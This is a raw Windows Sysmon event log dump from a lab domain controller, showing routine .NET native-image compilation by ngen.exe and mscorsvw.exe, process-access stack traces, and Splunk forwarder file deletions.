21:04:32.209{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E403-00000000CF01}7156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.178{4DB9351A-A1E0-60D3-E303-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1664-0\Microsoft.Windows.Diagnosis.SDEngine.dll2021-06-23 21:04:32.178 10341000x800000000000000020899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E303-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E303-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.131{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E303-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.100{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E203-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.084{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E203-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.084{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E203-00000000CF01}6868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.069{4DB9351A-A1E0-60D3-E103-00000000CF01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1610-0\Microsoft.Windows.Diagnosis.SDCommon.dll2021-06-23 21:04:32.069 10341000x800000000000000020892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.037{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E103-00000000CF01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.022{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-E103-00000000CF01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.022{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-E103-00000000CF01}5648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.975{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E1-60D3-ED03-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.959{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1E1-60D3-ED03-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.959{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E1-60D3-ED03-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.897{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E1-60D3-EC03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.881{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E1-60D3-EC03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.881{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E1-60D3-EC03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.881{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D964D6B689B5302CBE62085B24E1F954,SHA256=6E7BC6CE0ED2C24FF2F232702B83F41FFCB3055A23B4B553FC312277436D426D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:33.834{4DB9351A-A1E1-60D3-EB03-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1114-0\Microsoft.Windows.DSC.CoreConfProviders.dll2021-06-23 21:04:33.834 23542300x800000000000000020931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.256{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F7EDFD9300BEBFB304DA832B0C0B78,SHA256=016F373452BCD7C2E02074D1D612EB5074BAF5F8AE38FE648884D74F97518C52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.100{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E1-60D3-EB03-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.084{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E1-60D3-EB03-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:33.084{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E1-60D3-EB03-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.928{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E7826BFA441D41D8905E859C84EE1FC,SHA256=3E3A22830A2DF759EA841174FA07A2A1F874BAE8E80555B7D3F0DE57163EBB79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.537{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E2-60D3-EF03-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.522{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1E2-60D3-EF03-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 